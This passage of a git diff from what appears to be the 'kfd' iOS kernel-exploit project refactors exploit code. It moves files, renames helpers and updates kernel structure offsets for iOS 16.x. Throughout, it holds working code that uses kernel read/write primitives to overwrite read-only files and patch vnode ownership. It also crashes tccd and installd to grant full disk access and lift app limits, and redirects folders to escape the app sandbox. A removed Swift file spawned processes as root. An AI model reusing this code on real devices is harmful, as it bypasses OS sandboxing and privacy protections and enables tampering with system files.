kwrite32(fileglob + off_fg_flag, O_RDONLY); kwrite32(rootvnode_mount + off_mount_mnt_flag, rootvnode_mnt_flag); return true; @@ -375,7 +373,7 @@ static void grant_full_disk_access_impl(void (^completion)(NSString* extension_t } if (!overwrite_file(fd, sourceData)) { - //overwrite_file(fd, originalData); + overwrite_file(fd, originalData); munmap(targetMap, targetLength); completion( nil, [NSError errorWithDomain:@"com.worthdoingbadly.fulldiskaccess" @@ -388,11 +386,11 @@ static void grant_full_disk_access_impl(void (^completion)(NSString* extension_t } munmap(targetMap, targetLength); - kfd_xpc_crasher("com.apple.tccd"); + xpc_crasher("com.apple.tccd"); sleep(1); call_tccd(^(NSString* _Nullable extension_token) { overwrite_file(fd, originalData); - kfd_xpc_crasher("com.apple.tccd"); + xpc_crasher("com.apple.tccd"); NSError* returnError = nil; if (extension_token == nil) { returnError = @@ -415,7 +413,7 @@ static void grant_full_disk_access_impl(void (^completion)(NSString* extension_t }); } -void kfd_grant_full_disk_access(void (^completion)(NSError* _Nullable)) { +void grant_full_disk_access(void (^completion)(NSError* _Nullable)) { if (!NSClassFromString(@"NSPresentationIntent")) { // class introduced in iOS 15.0. // TODO(zhuowei): maybe check the actual OS version instead? @@ -476,7 +474,7 @@ void kfd_grant_full_disk_access(void (^completion)(NSError* _Nullable)) { uint64_t offset_return_true; }; -struct installd_remove_app_limit_offsets kfd_gAppLimitOffsets = { +struct installd_remove_app_limit_offsets gAppLimitOffsets = { .offset_objc_method_list_t_MIInstallableBundle = 0x519b0, .offset_objc_class_rw_t_MIInstallableBundle_baseMethods = 0x804e8, .offset_data_const_end_padding = 0x79c38, @@ -639,7 +637,7 @@ bool patch_installd() { return false; } munmap(targetMap, targetLength); - kfd_xpc_crasher("com.apple.mobile.installd"); + xpc_crasher("com.apple.mobile.installd"); sleep(1); // TODO(zhuowei): for now we revert it once installd starts diff --git a/kfd/fun/helpers.h b/kfd/overwrite/helpers.h similarity index 55% rename from kfd/fun/helpers.h rename to kfd/overwrite/helpers.h index 47f8170c..1c213423 100644 --- a/kfd/fun/helpers.h +++ b/kfd/overwrite/helpers.h @@ -1,11 +1,11 @@ #ifndef helpers_h #define helpers_h -char* kfd_get_temp_file_path(void); -void kfd_test_nsexpressions(void); -char* kfd_set_up_tmp_file(void); +char* get_temp_file_path(void); +void test_nsexpressions(void); +char* set_up_tmp_file(void); -void kfd_xpc_crasher(char* service_name); +void xpc_crasher(char* service_name); void restartBackboard(void); void restartFrontboard(void); diff --git a/kfd/fun/helpers.m b/kfd/overwrite/helpers.m similarity index 89% rename from kfd/fun/helpers.m rename to kfd/overwrite/helpers.m index 5a257369..10697276 100644 --- a/kfd/fun/helpers.m +++ b/kfd/overwrite/helpers.m @@ -3,13 +3,13 @@ #include #include -char* kfd_get_temp_file_path(void) { +char* get_temp_file_path(void) { return strdup([[NSTemporaryDirectory() stringByAppendingPathComponent:@"AAAAs"] fileSystemRepresentation]); } // create a read-only test file we can target: -char* kfd_set_up_tmp_file(void) { - char* path = kfd_get_temp_file_path(); +char* set_up_tmp_file(void) { + char* path = get_temp_file_path(); printf("path: %s\n", path); FILE* f = fopen(path, "w"); @@ -34,7 +34,7 @@ mach_msg_port_descriptor_t reply_port; }; -mach_port_t kfd_get_send_once(mach_port_t recv) { +mach_port_t get_send_once(mach_port_t recv) { mach_port_t so = MACH_PORT_NULL; mach_msg_type_name_t type = 0; kern_return_t err = mach_port_extract_right(mach_task_self(), recv, MACH_MSG_TYPE_MAKE_SEND_ONCE, &so, &type); @@ -51,7 +51,7 @@ mach_port_t kfd_get_send_once(mach_port_t recv) { // (in the exploit for this: https://googleprojectzero.blogspot.com/2019/04/splitting-atoms-in-xnu.html ) -void kfd_xpc_crasher(char* service_name) { +void xpc_crasher(char* service_name) { mach_port_t client_port = MACH_PORT_NULL; mach_port_t reply_port = MACH_PORT_NULL; @@ -75,8 +75,8 @@ void kfd_xpc_crasher(char* service_name) { return; } - mach_port_t so0 = kfd_get_send_once(client_port); - mach_port_t so1 = kfd_get_send_once(client_port); + mach_port_t so0 = get_send_once(client_port); + mach_port_t so1 = get_send_once(client_port); // insert a send so we maintain the ability to send to this port err = mach_port_insert_right(mach_task_self(), client_port, client_port, MACH_MSG_TYPE_MAKE_SEND); @@ -130,11 +130,11 @@ void kfd_xpc_crasher(char* service_name) { } void restartBackboard(void) { - kfd_xpc_crasher("com.apple.backboard.TouchDeliveryPolicyServer"); + xpc_crasher("com.apple.backboard.TouchDeliveryPolicyServer"); } void restartFrontboard(void) { // NOTE: This will not kill your app on some versions // You may also need to exit(0) afterwards - kfd_xpc_crasher("com.apple.frontboard.systemappservices"); + xpc_crasher("com.apple.frontboard.systemappservices"); } diff --git a/kfd/fun/krw.c b/kfd/overwrite/krw.c similarity index 100% rename from kfd/fun/krw.c rename to kfd/overwrite/krw.c diff --git a/kfd/fun/krw.h b/kfd/overwrite/krw.h similarity index 99% rename from kfd/fun/krw.h rename to kfd/overwrite/krw.h index 48d18979..ede1a510 100644 --- a/kfd/fun/krw.h +++ b/kfd/overwrite/krw.h @@ -7,8 +7,10 @@ #ifndef krw_h #define krw_h -#include "fun.h" + #include +#include "fun.h" + uint64_t do_kopen(uint64_t puaf_pages, uint64_t puaf_method, uint64_t kread_method, uint64_t kwrite_method); void do_kclose(void); diff --git a/kfd/fun/offsets.h b/kfd/overwrite/offsets.h similarity index 76% rename from kfd/fun/offsets.h rename to kfd/overwrite/offsets.h index b7f81e88..354fb5ca 100644 --- a/kfd/fun/offsets.h +++ b/kfd/overwrite/offsets.h @@ -41,6 +41,7 @@ extern uint32_t off_cr_svgid; extern uint32_t off_cr_gmuid; extern uint32_t off_cr_flags; extern uint32_t off_task_t_flags; +extern uint32_t off_task_itk_space; extern uint32_t off_fd_ofiles; extern uint32_t off_fd_cdir; extern uint32_t off_fp_glob; @@ -71,13 +72,20 @@ extern uint32_t off_mount_mnt_flag; extern uint32_t off_specinfo_si_flags; extern uint32_t off_namecache_nc_vp; extern uint32_t off_namecache_nc_child_tqe_prev; - -//uint32_t off_p_pfd = 0xf8; -//uint32_t off_fd_ofiles = 0; -//uint32_t off_fp_fglob = 0x10; -//uint32_t off_fg_data = 0x38; -//uint32_t off_vnode_iocount = 0x64; -//uint32_t off_vnode_usecount = 0x60; -//uint32_t off_vnode_vflags = 0x54; +extern uint32_t off_ipc_space_is_table; +extern uint32_t off_ubc_info_cs_blobs; +extern uint32_t off_ubc_info_cs_add_gen; +extern uint32_t off_cs_blob_csb_pmap_cs_entry; +extern uint32_t off_cs_blob_csb_cdhash; +extern uint32_t off_cs_blob_csb_flags; +extern uint32_t off_cs_blob_csb_teamid; +extern uint32_t off_cs_blob_csb_validation_category; +extern uint32_t off_pmap_cs_code_directory_ce_ctx; +extern uint32_t off_pmap_cs_code_directory_der_entitlements_size; +extern uint32_t off_pmap_cs_code_directory_trust; +extern uint32_t off_ipc_entry_ie_object; +extern uint32_t off_ipc_object_io_bits; +extern uint32_t off_ipc_object_io_references; +extern uint32_t off_ipc_port_ip_kobject; void _offsets_init(void); diff --git a/kfd/fun/offsets.m b/kfd/overwrite/offsets.m similarity index 87% rename from kfd/fun/offsets.m rename to kfd/overwrite/offsets.m index 491f04dd..3878e4b7 100644 --- a/kfd/fun/offsets.m +++ b/kfd/overwrite/offsets.m @@ -57,14 +57,11 @@ uint32_t off_vnode_v_data = 0; uint32_t off_vnode_v_kusecount = 0; uint32_t off_vnode_v_references = 0; -uint32_t off_vnode_v_lflag = 0; -uint32_t off_vnode_v_owner = 0; uint32_t off_vnode_v_parent = 0; uint32_t off_vnode_v_label = 0; uint32_t off_vnode_v_cred = 0; uint32_t off_vnode_v_writecount = 0; uint32_t off_vnode_v_type = 0; -uint32_t off_vnode_vu_ubcinfo = 0; uint32_t off_mount_mnt_data = 0; uint32_t off_mount_mnt_fsowner = 0; uint32_t off_mount_mnt_fsgroup = 0; @@ -77,25 +74,25 @@ #define SYSTEM_VERSION_EQUAL_TO(v) ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame) void _offsets_init(void) { - if (SYSTEM_VERSION_EQUAL_TO(@"16.1.2")) { - printf("[i] offsets selected for iOS 16.1.2\n"); + if(SYSTEM_VERSION_EQUAL_TO(@"16.1.2")||SYSTEM_VERSION_EQUAL_TO(@"16.2")||SYSTEM_VERSION_EQUAL_TO(@"16.3")||SYSTEM_VERSION_EQUAL_TO(@"16.3.1")) { + NSLog(@"[i] offsets selected for iOS 16.1.2"); //iPhone 14 Pro 16.1.2 offsets //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_internal.h#L273 //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 off_p_list_le_prev = 0x8; off_p_proc_ro = 0x18; - off_p_ppid = 0x20;//ok - off_p_original_ppid = 0x24;//ok - off_p_pgrpid = 0x28;//ok + off_p_ppid = 0x20; + off_p_original_ppid = 0x24; + off_p_pgrpid = 0x28; off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; - off_p_sessionid = 0x44;//ok - off_p_puniqueid = 0x48;//ok + off_p_sessionid = 0x44; + off_p_puniqueid = 0x48; off_p_pid = 0x60; off_p_pfd = 0xf8; off_p_textvp = 0x350; @@ -130,8 +127,6 @@ void _offsets_init(void) { off_fd_ofiles = 0; off_fd_cdir = 0x20; // new one! https://github.com/Baw-Appie/KernBypass/blob/69e5ae6baf04d0978358feee57eca8b8bc1382ed/kernel.h#L390 try these - off_fd_cdir = 0x20; - //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L125 off_fp_glob = 0x10; @@ -169,33 +164,33 @@ void _offsets_init(void) { off_namecache_nc_vp = 0x48; off_namecache_nc_child_tqe_prev = 0x10; - } else if (SYSTEM_VERSION_EQUAL_TO(@"16.6")) { - printf("[i] offsets selected for iOS 16.6\n"); - //iPhone SE 2 16.6 offsets + } else if (SYSTEM_VERSION_EQUAL_TO(@"16.6")||SYSTEM_VERSION_EQUAL_TO(@"16.5.1")) { + NSLog(@"[i] offsets selected for iOS 16.6"); + //iPhone 11 Pro 16.6 offsets //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_internal.h#L273 //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/queue.h#L487 - off_p_list_le_prev = 0x8;//ok + off_p_list_le_prev = 0x8; off_p_proc_ro = 0x18; - off_p_ppid = 0x20;//ok - off_p_original_ppid = 0x24;//ok - off_p_pgrpid = 0x28;//ok + off_p_ppid = 0x20; + off_p_original_ppid = 0x24; + off_p_pgrpid = 0x28; off_p_uid = 0x2c; off_p_gid = 0x30; off_p_ruid = 0x34; off_p_rgid = 0x38; off_p_svuid = 0x3c; off_p_svgid = 0x40; - off_p_sessionid = 0x44;//ok - off_p_puniqueid = 0x48;//ok - off_p_pid = 0x60;//ok - off_p_pfd = 0xf8;//p_fd__fd_ofiles? ok + off_p_sessionid = 0x44; + off_p_puniqueid = 0x48; + off_p_pid = 0x60; + off_p_pfd = 0xf8; off_p_textvp = 0x548; - off_p_name = 0x579;//ok + off_p_name = 0x381; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/proc_ro.h#L59 - off_p_ro_p_csflags = 0x1c;//ok - off_p_ro_p_ucred = 0x20;//ok + off_p_ro_p_csflags = 0x1c; + off_p_ro_p_ucred = 0x20; off_p_ro_pr_proc = 0; off_p_ro_pr_task = 0x8; off_p_ro_t_flags_ro = 0x78; @@ -216,17 +211,17 @@ void _offsets_init(void) { off_cr_flags = 0x5c; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/osfmk/kern/task.h#L280 - off_task_t_flags = 0x3D0;//ok + off_task_t_flags = 0x3D0; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/filedesc.h#L138 off_fd_ofiles = 0; off_fd_cdir = 0x20; // new one! https://github.com/Baw-Appie/KernBypass/blob/69e5ae6baf04d0978358feee57eca8b8bc1382ed/kernel.h#L390 try these //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L125 - off_fp_glob = 0x10;//ok? + off_fp_glob = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/file_internal.h#L179 - off_fg_data = 0x38;//ok? + off_fg_data = 0x38; off_fg_flag = 0x10; //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/vnode_internal.h#L158 @@ -239,14 +234,11 @@ void _offsets_init(void) { off_vnode_v_data = 0xe0; off_vnode_v_kusecount = 0x5c; off_vnode_v_references = 0x5b; - off_vnode_v_lflag = 0x58; - off_vnode_v_owner = 0x68; off_vnode_v_parent = 0xc0; off_vnode_v_label = 0xe8; off_vnode_v_cred = 0x98; off_vnode_v_writecount = 0xb0; off_vnode_v_type = 0x70; - off_vnode_vu_ubcinfo = 0x78; //https://github.com/apple-oss-distributions/xnu/blob/main/bsd/sys/mount_internal.h#L108 off_mount_mnt_data = 0x11F; @@ -263,7 +255,7 @@ void _offsets_init(void) { off_namecache_nc_child_tqe_prev = 0x0; }else { - printf("[-] No matching offsets.\n"); + NSLog(@"[-] No matching offsets."); exit(EXIT_FAILURE); } } diff --git a/kfd/fun/proc.c b/kfd/overwrite/proc.c similarity index 90% rename from kfd/fun/proc.c rename to kfd/overwrite/proc.c index 6e2b9e2f..3d816ff2 100644 --- a/kfd/fun/proc.c +++ b/kfd/overwrite/proc.c @@ -20,6 +20,9 @@ uint64_t getProc(pid_t pid) { return proc; } proc = kread64(proc + off_p_list_le_prev); + if(!proc) { + return -1; + } } return 0; @@ -32,18 +35,23 @@ uint64_t getProcByName(char* nm) { uint64_t nameptr = proc + off_p_name; char name[32]; do_kread(nameptr, &name, 32); - //printf("[i] pid: %d, process name: %s\n", kread32(proc + off_p_pid), name); +// printf("[i] pid: %d, process name: %s\n", kread32(proc + off_p_pid), name); if(strcmp(name, nm) == 0) { return proc; } proc = kread64(proc + off_p_list_le_prev); + if(!proc) { + return -1; + } } return 0; } int getPidByName(char* nm) { - return kread32(getProcByName(nm) + off_p_pid); + uint64_t proc = getProcByName(nm); + if(proc == -1) return -1; + return kread32(proc + off_p_pid); } int funProc(uint64_t proc) { diff --git a/kfd/fun/proc.h b/kfd/overwrite/proc.h similarity index 100% rename from kfd/fun/proc.h rename to kfd/overwrite/proc.h diff --git a/kfd/fun/thanks_opa334dev_htrowii.h b/kfd/overwrite/thanks_opa334dev_htrowii.h similarity index 51% rename from kfd/fun/thanks_opa334dev_htrowii.h rename to kfd/overwrite/thanks_opa334dev_htrowii.h index 199e3331..c7def95d 100644 --- a/kfd/fun/thanks_opa334dev_htrowii.h +++ b/kfd/overwrite/thanks_opa334dev_htrowii.h @@ -7,8 +7,5 @@ #import uint64_t funVnodeOverwrite2(char* tofile, char* fromfile); -uint64_t funVnodeOverwriteWithBytes(const char* filename, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd); -void funVnodeSave(char* file); void kreadbuf(uint64_t kaddr, void* output, size_t size); uint64_t getTask(void); -uint64_t funVnodeOverwriteForManager(NSString* to, NSString* from); diff --git a/kfd/fun/thanks_opa334dev_htrowii.m b/kfd/overwrite/thanks_opa334dev_htrowii.m similarity index 100% rename from kfd/fun/thanks_opa334dev_htrowii.m rename to kfd/overwrite/thanks_opa334dev_htrowii.m diff --git a/kfd/overwrite/utils.h b/kfd/overwrite/utils.h new file mode 100644 index 00000000..8177fd8c --- /dev/null +++ b/kfd/overwrite/utils.h @@ -0,0 +1,13 @@ +// +// utils.h +// kfd +// +// Created by Seo Hyun-gyu on 2023/07/30. +// + +#include +#include +#include + +void HexDump(uint64_t addr, size_t size); +bool sandbox_escape_can_i_access_file(char* path, int mode); diff --git a/kfd/overwrite/utils.m b/kfd/overwrite/utils.m new file mode 100644 index 00000000..c43712e4 --- /dev/null +++ b/kfd/overwrite/utils.m @@ -0,0 +1,90 @@ +// +// utils.m +// kfd +// +// Created by Seo Hyun-gyu on 2023/07/30. +// + +#import +#import +#import +#import +#import +#import "proc.h" +#import "vnode.h" +#import "krw.h" +#import "helpers.h" +#import "offsets.h" +#import "thanks_opa334dev_htrowii.h" +#import "utils.h" + +uint64_t createFolderAndRedirect(uint64_t vnode, NSString *mntPath) { + [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; + [[NSFileManager defaultManager] createDirectoryAtPath:mntPath withIntermediateDirectories:NO attributes:nil error:nil]; + uint64_t orig_to_v_data = funVnodeRedirectFolderFromVnode(mntPath.UTF8String, vnode); + + return orig_to_v_data; +} + +uint64_t UnRedirectAndRemoveFolder(uint64_t orig_to_v_data, NSString *mntPath) { + funVnodeUnRedirectFolder(mntPath.UTF8String, orig_to_v_data); + [[NSFileManager defaultManager] removeItemAtPath:mntPath error:nil]; + + return 0; +} + +void HexDump(uint64_t addr, size_t size) { + void *data = malloc(size); + kreadbuf(addr, data, size); + char ascii[17]; + size_t i, j; + ascii[16] = '\0'; + for (i = 0; i < size; ++i) { + if ((i % 16) == 0) + { + printf("[0x%016llx+0x%03zx] ", addr, i); +// printf("[0x%016llx] ", i + addr); + } + + printf("%02X ", ((unsigned char*)data)[i]); + if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') { + ascii[i % 16] = ((unsigned char*)data)[i]; + } else { + ascii[i % 16] = '.'; + } + if ((i+1) % 8 == 0 || i+1 == size) { + printf(" "); + if ((i+1) % 16 == 0) { + printf("| %s \n", ascii); + } else if (i+1 == size) { + ascii[(i+1) % 16] = '\0'; + if ((i+1) % 16 <= 8) { + printf(" "); + } + for (j = (i+1) % 16; j < 16; ++j) { + printf(" "); + } + printf("| %s \n", ascii); + } + } + } + free(data); +} + +bool sandbox_escape_can_i_access_file(char* path, int mode) { + NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"]; + uint64_t vnode = getVnodeAtPathByChdir([[NSString stringWithUTF8String:path] stringByDeletingLastPathComponent].UTF8String); + uint64_t orig_to_v_data = createFolderAndRedirect(vnode, mntPath); + + NSString *mountedPath = [NSString stringWithFormat:@"%@/%@", mntPath, [[NSString stringWithUTF8String:path] lastPathComponent]]; + + bool ret = false; + + if(access(mountedPath.UTF8String, mode) == 0) { + ret = true; + } + + UnRedirectAndRemoveFolder(orig_to_v_data, mntPath); + + return ret; +} diff --git a/kfd/fun/vm_unaligned_copy_switch_race.c b/kfd/overwrite/vm_unaligned_copy_switch_race.c similarity index 98% rename from kfd/fun/vm_unaligned_copy_switch_race.c rename to kfd/overwrite/vm_unaligned_copy_switch_race.c index 3a442d76..4493a7a9 100644 --- a/kfd/fun/vm_unaligned_copy_switch_race.c +++ b/kfd/overwrite/vm_unaligned_copy_switch_race.c @@ -88,7 +88,7 @@ switcheroo_thread(__unused void *arg) return NULL; } -bool kfd_unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd) { +bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd) { bool retval = false; pthread_t th = NULL; int ret; diff --git a/kfd/fun/vm_unaligned_copy_switch_race.h b/kfd/overwrite/vm_unaligned_copy_switch_race.h similarity index 74% rename from kfd/fun/vm_unaligned_copy_switch_race.h rename to kfd/overwrite/vm_unaligned_copy_switch_race.h index 57471624..02eb696e 100644 --- a/kfd/fun/vm_unaligned_copy_switch_race.h +++ b/kfd/overwrite/vm_unaligned_copy_switch_race.h @@ -5,4 +5,4 @@ /// `page_to_overwrite` should be a page aligned `PROT_READ` `MAP_SHARED` region. `` /// `overwrite_length` must be less than or equal to `PAGE_SIZE`. /// Returns `true` if the overwrite succeeded, and `false` if the device is not vulnerable. -bool kfd_unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd); +bool unaligned_copy_switch_race(int file_to_overwrite, off_t file_offset, const void* overwrite_data, size_t overwrite_length, bool unmapAtEnd); diff --git a/kfd/fun/vnode.h b/kfd/overwrite/vnode.h similarity index 91% rename from kfd/fun/vnode.h rename to kfd/overwrite/vnode.h index d1300d64..6a571e6f 100644 --- a/kfd/fun/vnode.h +++ b/kfd/overwrite/vnode.h @@ -6,7 +6,6 @@ // #include -#import //https://github.com/apple-oss-distributions/xnu/blob/xnu-8792.41.9/bsd/sys/mount.h#L293 #define MNT_RDONLY 0x00000001 /* read only filesystem */ @@ -22,16 +21,14 @@ #define FWRITE 0x00000002 uint64_t getVnodeAtPath(char* filename); /* return vnode of path, if open(filename, RD_ONLY) returned -1, it fails */ - uint64_t getVnodeAtPathByChdir(char *path); /* return vnode of path, but only directories work. NOT files. */ - uint64_t findRootVnode(void); /* return root vnode as is */ uint64_t getVnodeVar(void); /* return /var vnode as is */ uint64_t getVnodeVarMobile(void); /* return /var/mobile vnode as is */ uint64_t getVnodePreferences(void); /* return /var/mobile/Library/Preferences vnode as is */ uint64_t getVnodeLibrary(void); /* return /var/mobile/Library vnode as is */ uint64_t getVnodeSystemGroup(void); /* return /var/containers/Shared/SystemGroup vnode as is */ -uint64_t getVnodeCaches(void); /* returns caches vnode as is */ + /* Description: Hide file or directory. @@ -119,8 +116,3 @@ uint64_t findChildVnodeByVnode(uint64_t vnode, char* childname); https://openradar.appspot.com/FB8914231 */ uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from); - -uint64_t funVnodeOverwriteFileUnlimitSizeWithVnode(uint64_t to_vnode, char* from); -uint64_t funVnodeChownFolder(char* filename, uid_t uid, gid_t gid); -uint64_t funVnodeChmodFolder(char* filename, mode_t mode); -uint64_t funVnodeFolderForFileManager(NSString* filename, uid_t uid, gid_t gid); diff --git a/kfd/fun/vnode.m b/kfd/overwrite/vnode.m similarity index 84% rename from kfd/fun/vnode.m rename to kfd/overwrite/vnode.m index 3f69f436..fef9a160 100644 --- a/kfd/fun/vnode.m +++ b/kfd/overwrite/vnode.m @@ -120,40 +120,6 @@ uint64_t funVnodeChown(char* filename, uid_t uid, gid_t gid) { return 0; } -uint64_t funVnodeChownFolder(char* filename, uid_t uid, gid_t gid) { - - uint64_t vnode = getVnodeAtPathByChdir(filename); - if(vnode == -1) { - printf("[-] Unable to get vnode, path: %s", filename); - return -1; - } - - uint64_t v_data = kread64(vnode + off_vnode_v_data); - uint32_t v_uid = kread32(v_data + 0x80); - uint32_t v_gid = kread32(v_data + 0x84); - - //vnode->v_data->uid - printf("[i] Patching %s vnode->v_uid %d -> %d\n", filename, v_uid, uid); - kwrite32(v_data+0x80, uid); - //vnode->v_data->gid - printf("[i] Patching %s vnode->v_gid %d -> %d\n", filename, v_gid, gid); - kwrite32(v_data+0x84, gid); - - struct stat file_stat; - if(stat(filename, &file_stat) == 0) { - printf("[+] %s UID: %d\n", filename, file_stat.st_uid); - printf("[+] %s GID: %d\n", filename, file_stat.st_gid); - } - - return 0; -} - -uint64_t funVnodeFolderForFileManager(NSString* filename, uid_t uid, gid_t gid) { - funVnodeRedirectFolder((char *) [filename UTF8String], (char *) [filename UTF8String]); - //funVnodeChownFolder((char *) [filename UTF8String], uid, gid); - return 0; -} - uint64_t funVnodeChmod(char* filename, mode_t mode) { uint64_t vnode = getVnodeAtPath(filename); if(vnode == -1) { @@ -175,27 +141,6 @@ uint64_t funVnodeChmod(char* filename, mode_t mode) { return 0; } -uint64_t funVnodeChmodFolder(char* filename, mode_t mode) { - uint64_t vnode = getVnodeAtPathByChdir(filename); - if(vnode == -1) { - printf("[-] Unable to get vnode, path: %s", filename); - return -1; - } - - uint64_t v_data = kread64(vnode + off_vnode_v_data); - uint32_t v_mode = kread32(v_data + 0x88); - - printf("[i] Patching %s vnode->v_mode %o -> %o\n", filename, v_mode, mode); - kwrite32(v_data+0x88, mode); - - struct stat file_stat; - if(stat(filename, &file_stat) == 0) { - printf("[+] %s mode: %o\n", filename, file_stat.st_mode); - } - - return 0; -} - uint64_t findRootVnode(void) { uint64_t launchd_proc = getProc(1); @@ -234,7 +179,7 @@ uint64_t findRootVnode(void) { } uint64_t funVnodeRedirectFolder(char* to, char* from) { - uint64_t to_vnode = getVnodeAtPath(to); + uint64_t to_vnode = getVnodeAtPathByChdir(to); if(to_vnode == -1) { printf("[-] Unable to get vnode, path: %s\n", to); return -1; @@ -245,7 +190,7 @@ uint64_t funVnodeRedirectFolder(char* to, char* from) { uint32_t to_v_kusecount = kread32(to_vnode + off_vnode_v_kusecount); uint64_t orig_to_v_data = kread64(to_vnode + off_vnode_v_data); - uint64_t from_vnode = getVnodeAtPath(from); + uint64_t from_vnode = getVnodeAtPathByChdir(from); if(from_vnode == -1) { printf("[-] Unable to get vnode, path: %s\n", from); return -1; @@ -272,10 +217,7 @@ uint64_t funVnodeRedirectFolder(char* to, char* from) { uint64_t funVnodeOverwriteFile(char* to, char* from) { int to_file_index = open(to, O_RDONLY); - if (to_file_index == -1) { - printf("\nto file nonexistent: %s\n", to); - return -1; - } + if (to_file_index == -1) return -1; off_t to_file_size = lseek(to_file_index, 0, SEEK_END); int from_file_index = open(from, O_RDONLY); @@ -417,31 +359,6 @@ uint64_t funVnodeIterateByVnode(uint64_t vnode) { return 0; } -uint64_t getVnodeCaches(void) { - - // var/mobile/Library/Caches/com.apple.keyboards - // 1 up, up to Caches - const char* path = "/var/mobile/Library/Caches/com.apple.keyboards"; - - uint64_t vnode = getVnodeAtPath(path); - if(vnode == -1) { - printf("[-] Unable to get vnode, path: %s\n", path); - sleep(0.1); - return -1; - } - - uint64_t parent_vnode = vnode; - parent_vnode = kread64(parent_vnode + off_vnode_v_parent) | 0xffffff8000000000; - - uint64_t vp_nameptr = kread64(parent_vnode + off_vnode_v_name); - char vp_name[16]; - do_kread(vp_nameptr, &vp_name, 16); - - printf("[i] vnode->v_name: %s\n", vp_name); - - return parent_vnode; -} - uint64_t getVnodeVar(void) { return getVnodeAtPathByChdir("/private/var"); } @@ -465,16 +382,9 @@ uint64_t getVnodeSystemGroup(void) { uint64_t findChildVnodeByVnode(uint64_t vnode, char* childname) { uint64_t vp_nameptr = kread64(vnode + off_vnode_v_name); uint64_t vp_name = kread64(vp_nameptr); - - char _vp_name[16]; - do_kread(vp_nameptr, &_vp_name, 16); - - printf("found named %s\n", _vp_name); - + uint64_t vp_namecache = kread64(vnode + off_vnode_v_ncchildren_tqh_first); - printf("vp_namecache: 0x%02llX", vp_namecache); - if(vp_namecache == 0) return 0; @@ -482,26 +392,25 @@ uint64_t findChildVnodeByVnode(uint64_t vnode, char* childname) { if(vp_namecache == 0) break; vnode = kread64(vp_namecache + off_namecache_nc_vp); - if(vnode == 0) break; vp_nameptr = kread64(vnode + off_vnode_v_name); - char vp_name[16]; - do_kread(vp_nameptr, &vp_name, 16); + char vp_name[256]; + kreadbuf(vp_nameptr, &vp_name, 256); +// printf("vp_name: %s\n", vp_name); - printf("%s\n", vp_name); usleep(50); - if(strcmp(vp_name, childname) == 0) { return vnode; } vp_namecache = kread64(vp_namecache + off_namecache_nc_child_tqe_prev); } + return 0; } uint64_t funVnodeRedirectFolderFromVnode(char* to, uint64_t from_vnode) { - uint64_t to_vnode = getVnodeAtPath(to); + uint64_t to_vnode = getVnodeAtPathByChdir(to); if(to_vnode == -1) { printf("[-] Unable to get vnode, path: %s\n", to); return -1; @@ -531,7 +440,7 @@ uint64_t funVnodeRedirectFolderFromVnode(char* to, uint64_t from_vnode) { } uint64_t funVnodeUnRedirectFolder (char* to, uint64_t orig_to_v_data) { - uint64_t to_vnode = getVnodeAtPath(to); + uint64_t to_vnode = getVnodeAtPathByChdir(to); if(to_vnode == -1) { printf("[-] Unable to get vnode, path: %s\n", to); return -1; @@ -556,10 +465,7 @@ uint64_t funVnodeUnRedirectFolder (char* to, uint64_t orig_to_v_data) { uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from) { int to_file_index = open(to, O_RDONLY); - if (to_file_index == -1) { - printf("to file nonexistent\n"); - return -1; - } + if (to_file_index == -1) return -1; int from_file_index = open(from, O_RDONLY); if (from_file_index == -1) return -1; @@ -596,7 +502,7 @@ uint64_t funVnodeOverwriteFileUnlimitSize(char* to, char* from) { } printf("[i] ftruncate ret: %d\n", ftruncate(to_file_index, 0)); - printf("[i] write: %zd\n", write(to_file_index, from_mapped, from_file_size)); + printf("[i] write ret: %zd\n", write(to_file_index, from_mapped, from_file_size)); munmap(from_mapped, from_file_size); diff --git a/kfd/test.swift b/kfd/test.swift deleted file mode 100644 index c1584bdf..00000000 --- a/kfd/test.swift +++ /dev/null @@ -1,40 +0,0 @@ -// -// test.swift -// kfd -// -// Created by LL on 27/7/23. -// - -import SwiftUtils - -public func execCmd(args: [String], fileActions: posix_spawn_file_actions_t? = nil) -> Int32? { - var fileActions = fileActions - - var attr: posix_spawnattr_t? - posix_spawnattr_init(&attr) - posix_spawnattr_set_persona_np(&attr, 99, 1) - posix_spawnattr_set_persona_uid_np(&attr, 0) - posix_spawnattr_set_persona_gid_np(&attr, 0) - - var pid: pid_t = 0 - var argv: [UnsafeMutablePointer?] = [] - for arg in args { - argv.append(strdup(arg)) - } - - argv.append(nil) - - let result = posix_spawn(&pid, argv[0], &fileActions, &attr, &argv, environ) - let err = errno - guard result == 0 else { - NSLog("Failed") - NSLog("Error: \(result) Errno: \(err)") - - return nil - } - - var status: Int32 = 0 - waitpid(pid, &status, 0) - - return status -}